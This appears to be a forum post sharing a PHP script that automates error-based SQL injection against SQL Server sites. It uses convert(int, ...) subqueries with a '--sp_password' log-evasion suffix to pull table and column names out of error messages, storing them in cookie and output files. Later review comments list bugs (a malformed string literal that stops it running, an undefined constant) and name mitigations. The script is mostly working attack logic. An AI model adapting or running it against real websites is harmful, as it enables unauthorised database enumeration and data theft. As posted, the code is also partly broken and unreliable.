by h7t_2002 Mon Nov 15, 2010 6:56 am
- Code:
<?php
// Script-wide runtime settings: lift the execution-time cap first (the enumeration
// below is long-running), then stream every print immediately instead of buffering it.
set_time_limit(0);
ob_implicit_flush(true);
/**
 * Fetch $url with cURL and return the trimmed response body.
 *
 * Cookies are persisted between calls in hacking.txt next to this script, so a
 * session obtained by one request is reused by the next.
 *
 * @param string $url  Absolute URL to request.
 * @param string $post Raw POST body; when truthy the request is sent as POST.
 * @return string Trimmed body, or "" when curl_exec() fails (trim(false) gives "").
 */
function geturl($url = "", $post = "") {
$cUrl = curl_init();
curl_setopt($cUrl, CURLOPT_URL, $url);
if ($post) {
curl_setopt($cUrl, CURLOPT_POST, 1);
curl_setopt($cUrl, CURLOPT_POSTFIELDS, $post);
}
// BUG: CURLOPT_TIMEOUT expects an integer number of seconds; this placeholder string was never
// replaced and presumably coerces to 0, i.e. no timeout at all -- a hung target stalls the script.
curl_setopt($cUrl, CURLOPT_TIMEOUT, 'timeout_in_seconds');
// Hard-coded legacy browser string (IE 5.01 / Windows 2000): an easy fingerprint in web server logs.
curl_setopt($cUrl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($cUrl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cUrl, CURLOPT_FOLLOWLOCATION, 1);
// BUG: FOLLOW_LOCATION is not a PHP cURL constant (an undefined-constant error on PHP 8);
// the line above already enables redirect following.
curl_setopt($cUrl, FOLLOW_LOCATION , 1);
// strstr() matches "https" anywhere in the URL, not only in the scheme.
if(strstr($url,"https")) {
curl_setopt($cUrl, CURLOPT_SSL_VERIFYHOST, 2);
// Peer certificate verification is switched off, so the TLS session can be intercepted silently.
curl_setopt($cUrl, CURLOPT_SSL_VERIFYPEER, FALSE);
}
// Cookie jar on disk beside the script: a distinctive on-host artifact when this file is found.
curl_setopt($cUrl, CURLOPT_COOKIEFILE, dirname(__FILE__)."/hacking.txt");
curl_setopt($cUrl, CURLOPT_COOKIEJAR, dirname(__FILE__)."/hacking.txt");
// Transport errors are not distinguished from an empty body: curl_exec() false becomes "".
$pageContent = trim(curl_exec($cUrl));
curl_close($cUrl);
return $pageContent;
}
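/**
 * Return the text of $str between the first (case-insensitive) occurrence of
 * $left and the first occurrence of $right after it.
 *
 * Contract kept from the original: any empty argument yields "", a missing
 * $left yields "", and a missing $right yields everything after $left.
 * stristr() is case-insensitive, so "VALUE '" also matches "value '".
 *
 * @param string $str   Haystack to search.
 * @param string $left  Opening delimiter (not included in the result).
 * @param string $right Closing delimiter (not included in the result).
 * @return string Extracted text, or "" when nothing can be extracted.
 */
function cut_str($str = "", $left = "", $right = "") {
    if ($str == "" || $left == "" || $right == "") {
        return "";
    }
    // Explicit false checks: the original fed stristr()'s false straight into
    // substr()/strlen(), which is deprecated on PHP 8.1 and returned false
    // instead of "" on PHP 7.
    $afterLeft = stristr($str, $left);
    if ($afterLeft === false) {
        return "";
    }
    $afterLeft = substr($afterLeft, strlen($left));
    $tail = stristr($afterLeft, $right);
    if ($tail === false) {
        // No closing delimiter: keep everything after $left, as before.
        return $afterLeft;
    }
    return substr($afterLeft, 0, -strlen($tail));
}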
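/**
 * Overwrite $filename with $newdata, creating the file if needed.
 *
 * @param string $filename Path to write.
 * @param string $newdata  Content to store; "" truncates the file.
 * @return void
 * @throws RuntimeException when the file cannot be written. The original
 *         passed fopen()'s false straight to fwrite() instead of checking it.
 */
function write_file($filename, $newdata = "") {
    // One call opens, writes and closes, so no handle is left open on failure.
    if (file_put_contents($filename, $newdata) === false) {
        throw new RuntimeException("Cannot write to " . $filename);
    }
}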
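/**
 * Append $newdata to $filename, creating the file if needed.
 *
 * @param string $filename Path to append to.
 * @param string $newdata  Content to add at the end of the file.
 * @return void
 * @throws RuntimeException when the file cannot be written. The original
 *         passed fopen()'s false straight to fwrite() instead of checking it.
 */
function append_file($filename, $newdata) {
    // FILE_APPEND reproduces the "a" open mode; LOCK_EX serialises concurrent appends.
    if (file_put_contents($filename, $newdata, FILE_APPEND | LOCK_EX) === false) {
        throw new RuntimeException("Cannot append to " . $filename);
    }
}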
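/**
 * Return the whole content of $filename.
 *
 * @param string $filename Path to read.
 * @return string File content; "" for an empty file.
 * @throws RuntimeException when the file cannot be read. The original passed
 *         fopen()'s false straight to fread() instead of checking it.
 */
function read_file($filename) {
    // file_get_contents() handles empty files; the original fread($f, filesize(...))
    // throws a ValueError on PHP 8 when filesize() is 0.
    $data = file_get_contents($filename);
    if ($data === false) {
        throw new RuntimeException("Cannot read " . $filename);
    }
    return $data;
}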
// Base URL with the injection prefix already appended; "domainurl" is an unfilled placeholder.
$url = "domainurl'%20and%201=";
// NOTE(review): as written the value carries no scheme, so parse_url() returns no 'host'
// key; the next line then warns about an undefined index and $url2 holds no usable label.
$url1 = parse_url($url);
// $url2[1] (the second dot-separated label of the host) prefixes every output file below.
$url2 = explode(".",$url1['host']);
/**
 * Recursively enumerate table names through the injection point in the global $url.
 *
 * Each pass asks for one TABLE_NAME from INFORMATION_SCHEMA.TABLES that is not in the
 * NOT IN list built so far, forces a conversion error with convert(int, ...), and parses
 * the name out of the verbose error text between "value '" and "' to". The name is
 * appended to <second host label>_tables.txt and printed, then the function recurses
 * with that name added to the exclusion list until a request yields an empty name.
 * Recursion depth is unbounded (one level per table).
 *
 * Mitigation on the server side is the usual one: parameterised queries, plus generic
 * error pages so that database error text never reaches the client.
 *
 * @param string $query Quoted, comma-separated names already seen ("" on the first call).
 * @return void
 */
function get_table($query = "") {
global $url;
$query = str_replace(" ", "%20", trim($query));
$query = str_replace("+", "%2b", trim($query));
// BUG: the backslash escapes the closing quote, which unbalances the string literals on this
// line; the file does not parse, so nothing in this script runs as posted.
$query = str_replace("\", " ", trim($query));
$post = "convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES";
if($query != "") {
$post .= "%20WHERE%20TABLE_NAME%20Not%20in(" . $query . ")";
}
// "--" comments out the rest of the original statement. The trailing sp_password token is a
// well-known SQL Server log-evasion marker: a high-confidence string to alert on in request logs.
$post .= "))--sp_password";
$raw_content = geturl($url.$post);
// Error-based extraction: the value is read out of the error message. A server that returns
// a generic error page yields "" here and the enumeration stops.
$table = trim(cut_str($raw_content, "value '", "' to"));
// These shadow the globals of the same name; $url2[1] is the second dot-separated host label.
$url1 = parse_url($url);
$url2 = explode(".",$url1['host']);
// NOTE(review): $table comes straight from the remote response and is written unsanitised.
append_file($url2[1]."_tables.txt",$table."\n");
print $table . "\n";
// Recurse with the new name quoted and added to the exclusion list; stop when nothing new came back.
if ($table != "" && $query != "") {
get_table($query . ",'" . $table . "'");
} else if($table !="") {
get_table("'" . $table . "'");
}
}
/**
 * Recursively enumerate the column names of $table through the injection point in the
 * global $url, one name per request, with the same convert(int, ...) error-based trick
 * as get_table().
 *
 * Every name found is appended to $file_name and echoed; recursion stops when the parsed
 * name is empty. Depth is unbounded (one level per column).
 *
 * @param string $query     Quoted, comma-separated names already seen (columns() passes "''").
 * @param string $table     Table whose columns are listed.
 * @param string $file_name Output file. A required parameter after optional ones is
 *                          deprecated since PHP 8.0.
 * @return void
 */
function get_column($query = "", $table = "",$file_name) {
global $url;
$data = array();
// $table and $query are interpolated into the request as-is; the trailing sp_password token
// is a well-known SQL Server log-evasion marker worth alerting on in request logs.
$post = "convert(int,(SELECT%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME='" . $table . "'%20AND%20COLUMN_NAME%20NOT%20IN(" . $query . ")))--sp_password";
$raw_content = geturl($url.$post);
//echo $raw_content;
// The surrounding "" . ... . "" concatenations are no-ops; the name is parsed out of the error text.
$column = "" . trim(cut_str($raw_content, "value '", "' to")) . "";
$data['column'] = $column;
$data['query'] = $query;
$data['table'] = $table;
// An empty name (no verbose error, or nothing left to list) ends the recursion.
if ($data['column'] != "") {
// NOTE(review): $data['column'] comes straight from the remote response and is written unsanitised.
append_file($file_name,$data['column']."\n");
print "++ Inserted Column ".$data['column']." of Table: ".$table."\n";
if($data['query'] == "") {
get_column("'".$data['column']."'", $table,$file_name);
// This else-if condition is always true once reached; a plain else would do.
} else if($data['query'] !="") {
get_column($data['query'] . ",'" . $data['column']."'", $table,$file_name);
}
}
}
/**
 * Run get_column() for every table name in the global $tables list (one name per line,
 * as read by file()), skipping blank lines and the three names in $systables.
 *
 * Output goes to <second host label>_<table>.txt. Lines from file() still carry their
 * newline, which is why the needle is trim()med before the in_array() check (non-strict)
 * and the line endings are stripped afterwards.
 *
 * @return void
 */
function columns() {
global $tables,$url2;
// Names of legacy SQL Server system objects that are not worth listing columns for.
$systables = array("sysconstraints","syssegments","dtproperties");
foreach($tables as $table) {
if(!in_array(trim($table),$systables) && $table != "") {
$table = str_replace("\n","",$table);
$table = str_replace("\r","",$table);
// NOTE(review): $table originates from the remote server's response and reaches fopen()
// unsanitised as part of a local file name (no check for separators or "..").
$file_name = $url2[1]."_".$table.".txt";
// "''" seeds the NOT IN list with an empty quoted name so the first request is well-formed.
get_column("''",trim($table),$file_name);
}
}
}
// Main flow: enumerate table names (written to <second host label>_tables.txt), reload that
// file as a list of lines, then enumerate the columns of each table.
get_table("");
// NOTE(review): file() returns false with a warning when the file was never created (no
// table name extracted), and the foreach in columns() then warns on the non-array as well.
$tables = file($url2[1]."_tables.txt");
columns();
// Explicit end of the script; nothing after this point runs.
exit();
?>